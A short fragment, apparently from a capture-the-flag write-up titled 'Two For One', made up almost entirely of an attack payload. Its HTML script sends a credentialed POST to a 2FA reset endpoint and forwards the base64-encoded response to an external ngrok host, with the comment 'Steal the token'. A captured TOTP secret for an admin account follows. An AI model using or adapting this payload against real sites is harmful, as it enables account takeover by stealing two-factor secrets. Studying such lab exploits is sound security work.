Two For One
<html>
<body>
<script>
fetch("/reset2fa", {
method: "POST",
credentials: "include"
})
.then(response => response.text())
.then(text => {
// Steal the token
fetch("http://dffa-42-60-216-15.ngrok.io/" + btoa(text));
});
</script>
</body>
</html>{"url":"otpauth://totp/Fort%20Knox:admin?secret=POYRTZ7WQMGBJZIX&issuer=Fort%20Knox"}Last updated